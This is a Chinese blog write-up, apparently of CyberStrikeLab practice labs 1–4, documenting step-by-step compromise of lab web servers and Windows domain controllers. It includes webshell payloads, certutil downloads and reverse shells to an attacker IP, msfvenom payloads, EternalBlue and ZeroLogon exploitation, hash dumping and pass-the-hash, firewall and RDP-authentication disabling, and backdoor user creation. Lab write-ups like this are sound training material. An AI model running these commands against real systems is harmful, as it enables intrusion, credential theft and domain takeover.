
CyberStrikeLab - lab1-7

靶机拓扑图
Lab1 - Lab7 网络配置不变,都是这样子

Lab1
难度: 简单
目标:本次小李的任务是攻克 192.168.10.0/24 网段的所有主机,刚开始挺顺利,但深入后发现里面的情况远比想象中的复杂。
信息收集
使用 fscan 对 192.168.10.* 网段进行存活、端口及漏洞扫描,检测出了 thinkphp5023 漏洞

站点如下

边界突破 - 192.168.10.10
ThinkPHP 5.0.23 RCE
工具库利用
使用 ThinkPHP 漏洞扫描工具进行历史漏洞扫描,发现大量 thinphp nday 都能打通


上传一句话木马文件

蚁剑连接成功

手工利用
再换一种手工利用的手法
1 | GET: http://192.168.10.10/?s=captcha&test=-1 |
执行有一瞬间出现命令执行结果,然后跳转至 404 页面


接下来手工利用反弹 shell,nc 开启 22222 Port

生成 powershell 反弹命令,IP 选择 OpenVPN 分配的 IP 172.16.233.2

Base64 编码并执行,注意关闭防火墙或设置防火墙配置

成功得到 Shell

直接 > 写入一句话木马发现每个字符间存在空字节,导致 PHP 解析错误;
系统内有 certutil,使用其下载本地准备好的一句话木马

本地开启 python web服务

1 | certutil -urlcache -split -f http://172.16.233.2:22223/1.php |

一句话木马文件下载在网站根目录,蚁剑连接,成功

C 盘根目录拿下旗帜一

上线 CS
上传 CS 木马并执行

机器上线成功

禁用防火墙
1 | netsh advfirewall set allprofiles state off //关闭所有防火墙,winsows server 2003 之后 |

3389 远程桌面连接
开启 3389 端口
1 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f |

添加自定义用户
1 | net user abcc 123@abc /add |

尝试远程桌面连接

身份证验证导致的错误,直接禁用掉身份证验证
1 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f |

再次尝试,成功登录

数据库
翻阅 phpstudy,找到数据库用户名密码
1 | root/cyberstrike@2024 |

尝试使用 phpstudy 文件 mysql.exe 登录数据库,失败

phpstudy 中MYSQL并没有开启,尝试直接点击启动,会马上跳回关闭,启动失败

很奇怪的状态,对方是有 3306 端口使用的,我尝试查看当前 mysql 状态
1 | sc query mysql |
state: 1 stopped,当前 mysql 并没有开启

接下来登录管理员命令行开启 mysql,Windows Server 2012R2 环境较老,win + R 在运行启用管理员命令行失败。打开任务管理器,点击文件,运行新任务,勾选以系统管理权限创建此任务,确定。


启动 mysql 服务
1 | net start mysql |

再次尝试连接 MySQL,登录成功


创建一个允许远程连接的用户并给予足够权限
1 | CREATE USER 'aabbcc'@'%' IDENTIFIED BY 'aabbcc'; |

拿下数据库

域渗透
内网信息收集
外网机器是双网卡,目标内网还有一个 192.168.20.X 网段


Fscan 扫描
使用 fscan 对 20 段进行扫描
1 | fscan.exe -h 192.168.20.0/24 |
发现 20 和 30 都有永恒之蓝漏洞
1 | 192.168.20.20:139 open |
域控 - 192.168.20.30
CS 派发 MSF 会话,先开启MSF
1 | use exploit/multi/handler |
CS 启动监听,配置与 MSF 一致

选择 192.168.10.10 会话,spawn 选择刚配置的监听,点击 Choose,MSF 成功接收到 CS 的会话

MSF 配置路由
1 | run autoroute -s 192.168.20.0/24 |

MSF 设置 Socks 代理
1 | search socks || use auxiliary/server/socks_proxy |

永恒之蓝漏洞利用,尝试模块,发现 ms17_010_command 能够被利用
1 | search ms17_010 |

1 | set COMMAND 'dir C:\' |

1 | set COMMAND 'type C:\flag.txt' |
拿到第二个旗帜

1 | set COMMAND 'net user abcc 123@abc /add' |


远程桌面连接

.\用户名 登录,成功登录


域成员 - 192.168.20.20
这台机器同样爆出了永恒之蓝,但一直利用失败,不过因为我们已经拿下域控制器,所以可以换一种方式,去拿域控制器的 hash,对域成员做 PTH 攻击
上线 MSF
1 | use exploit/multi/handler |
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe |
制作木马并上传,上传稍麻烦,因为隧道搭在 MSF,因此选择将木马上传到 192.168.10.10 主机上,通过 phpstudy 自带 php 开启 Web 服务,再通过 192.168.20.30 浏览器下载文件
1 | php.exe -S 0.0.0.0:22222 |
访问并保存,运行即可

运行时注意管理员身份运行


获取 hash

1 | Administrator:500:aad3b435b51404eeaad3b435b51404ee:94bd5248e87cb7f2f9b871d40c903927::: |
1 | proxychains4 -q python3 psexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20 |

拿到最后的旗帜

Lab2
难度: 简单
目标:公司派遣测试某网络的安全性。目标是成功获取所有服务器的权限,以评估网络安全状况。
漏洞扫描:
对 192.168.10.* 网段进行扫描,发现 192.168.10.20 可能存在 CVE-2017-12615 历史漏洞,以及 192.168.10.10 74 CMS
1 | [+] PocScan http://192.168.10.20:8080 poc-yaml-iis-put-getshell |

独立工作站 - 192.168.10.10
骑士CMS 渗透,我对 808 端口进行目录扫描,扫描的同时对 Web 页面进行初步观测,尝试寻找 SQL 注入、SSRF 等常规 Web 漏洞,可惜并没有发现有效入口点

常规字典下扫描也没有发现特别信息

渗透并不顺利,我转而在网络检索尝试找到更多线索,在某个官方文档中发现了该 CMS 的通用管理员页面路径
1 | /index.php?m=admin&c=index&a=login |

弱口令/爆破
直接输入错误账户名,会回显管理员账号不存在,这使得很顺利地测试出管理员账号名 admin

简单测试一下密码就出来了,靶机并没有在这方面上难为人
1 | admin/admin123456 |

进入后台,我发现了目标 74 CMS 版本为 v4.2.111,依此找到了其历史漏洞后台 GetShell

依次点击工具、风格模板、可用模板并抓包

tpl_dir 改为如下 Payload
1 | tpl_dir=','a',eval($_POST['cmd']),' |
随后访问路径
1 | /Application/Home/Conf/config.php |
命令执行成功,直接拿到了 system 权限

使用 certitul 下载文件并上线 CS

拿到第一个旗帜

域边界突破 - 192.168.10.20
Tomcat 任意文件写入

接下来对 192.168.10.20 已经发现的 Nday 进行利用,手工抓包上传,Payload 如下
1 | PUT /1.jsp/ HTTP/1.1 |

访问 JSP 一句话木马,命令执行成功
1 | http://192.168.10.20:8080/1.jsp?pwd=023&i=whoami |

Powershell + Base64 反弹,使用浏览器发送时注意对 Payload 进行 URL 编码

成功接收到反弹 Shell

拿到第二个旗帜

权限提升
上线CS


1 | whoami /priv |
查询特权,发现 SeImpersonatePrivilege 启用

尝试使用经典烂土豆提权,成功接收到 System 权限级 Beacon


远程桌面连接
开启 3389 后连接报错,是身份证验证错误,直接禁用掉

1 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f |

连接成功

域渗透
信息收集
继续对当前主机进行信息收集
1 | wmic computersystem get domainrole |
返回数值为3,当前是一台域成员服务器

本地管理员组中含有 Domain Admins,该信息也在域全局组中,再次确认系统为域成员服务器

发现这是一台双网卡主机,还有一个 20.* 网段

fscan 扫描,发现域控服务器 192.168.20.30 且存在永恒之蓝漏洞

域控 - 192.168.20.30
msf 打永恒之蓝,通过 admin/smb/ms17_010_command 模块执行成功,拿到 flag

修改管理员密码,打开 3389 端口,拿下远程桌面

代理转发上线 CS
之前直接利用 CS 的永恒之蓝漏洞插件攻击 20.30 失败,而我对上线 CS 又有执念。于是我尝试通过 iox 代理转发,给域控上传文件并上线 CS,因为实际上只需要做一层代理隧道,所以操作并不复杂。
接下来 20.20 统称域成员主机,20.30 为域控
首先生成 CS 马,配置为 192.168.20.20:29999
。然后在域成员跳板机开启第一层代理隧道
1 | iox.exe proxy -l 1080 |

proxychains4 配置文件修改,将流量转发至域成员主机,以此连接域控远程桌面
1 | socks5 192.168.10.20 1080 |

然后域成员主机通过 iox 将本地 8888 端口转发至攻击机 28888 端口
1 | iox.exe fwd -l 192.168.20.20:8888 -r 172.16.233.2:28888 |

攻击机开启 Web 服务,域控远程桌面下载 CS 马
1 | certutil -urlcache -split -f http://192.168.20.20:8888/artifact.exe |
接下来域成员主机通过 iox 将本地 29999 端口转发至攻击机 29999 端口
1 | iox.exe fwd -l 29999 -r 172.16.233.2:29999 |
最后域控执行 CS 马,上线成功

Lab3
难度: 简单
目标:在192.168.10.0/24网段发现了不得了的秘密。
信息收集
探测存活主机、端口扫描、服务探测等,扫描全端口,发现 3590 端口开放了 Web 服务


边界机 - 192.168.10.10
SQL 注入
目录扫描,发现后台管理员页面


通过 taoCMS 默认账户密码登录后台
1 | admin/tao |

尝试数据管理 - 执行 SQL 模块

权限级低,没有任何插入、更新或删除权限,日志包含、文件写入等操作走不通了

taoCMS 还存在一个 SQL 注入的历史漏洞 CVE-2021-44915,可惜通过 MYSQL 获取 Shell 的条件很苛刻,也只能放弃


路径遍历 && 文件上传
继续对历史漏洞进行检索,发现一个可利用的历史漏洞 CVE-2022-23880

../../../ 访问根目录,下载 Flag 文件,拿到第一个旗帜

编辑文件,写入一句话木马,保存

网站根目录就在当前路径,访问指定文件即可
1 | http://192.168.10.10:3590/api.php |
目标是 Windows 系统,上传木马并上线 CS

域渗透
内网信息收集
发现内网另一个网段 192.168.20.10,lab1-7 的网络配置都一样。。
1 | arp -a |

使用 fscan 对 20 段进行扫描

域成员 - 192.168.20.20
这台域成员机器甚至不需要进行漏洞利用,官方已经做了提示

端口及服务探测,发现 8055 端口搭建了 Web 服务

搭建内网隧道访问,发现对方用的是 ThinkPHP v5.0

找了半天也没发现有什么明显遗留的木马文件

只有找到两个 php 文件,index.php 和 router.php,使用一句话木马爆破脚本爆破一下

访问拿到 第二个旗帜



域控 - 192.168.20.30
ZeroLogon

使用 ZeroLogon 漏洞置空域控主机 hash
1 | python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30 |

然后拿下域控制器 hash
1 | python secretsdump.py 'cyberstrikelab.com/WIN-7NRTJO59O7N$@192.168.20.30' -no-pass |

远程命令执行 ,拿到最后的旗帜
1 | proxychains4 -q python3 wmiexec.py Administrator@192.168.20.30 -hashes aad3b435b51404eeaad3b435b51404ee:f349636281150c001081894de72b4e2b -codec gbk |

Lab4
难度:简单
目标:今天的你是一位白帽工程师,你发现某公司暴露在公网的cms有极其罕见的漏洞,于是你决定帮忙进行测试。
信息收集


边界突破 - 192.168.10.10
5820 搭建了一个 Bluecms,这个 cms 有一堆历史漏洞

SQL 注入
通过SQL注入拿到账户密码,密码是个弱口令,直接弱口令尝试都能进后台。
1 | http://192.168.10.10:5820/ad_js.php?ad_id=1 |

爆库

爆表

路径穿越 && 任意文件修改
进入后台后充值中心 -> 金币充值 -> 在线支付并抓包

修改 tpl_name 至指定文件路径

然后就能任意修改文件内容了,添加一句话木马并保存

访问,执行命令成功

上线 CS

拿到第一个旗帜

域渗透
内网信息收集
内网信息还是和之前一样,20.20 是域成员,20.30 是域控
`
域控 - 192.168.20.30
这台域控依然可以使用 Zerologon 漏洞,通过其重置域控 hash

导出域内所有用户的凭证,拿下域控管理员 hash
1 | aad3b435b51404eeaad3b435b51404ee:00f995cbe63fd30411f44d434b8dac98 |

登录域控

拿到第二个旗帜

域成员 - 192.168.20.20
PTH 攻击,拿到第三个旗帜,结束

- 标题: CyberStrikeLab - lab1-7
- 作者: Octopus
- 创建于 : 2025-03-05 16:04:17
- 更新于 : 2025-03-12 14:37:03
- 链接: https://redefine.ohevan.com/2025/03/05/CyberStrikeLab-lab1-7/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
预览: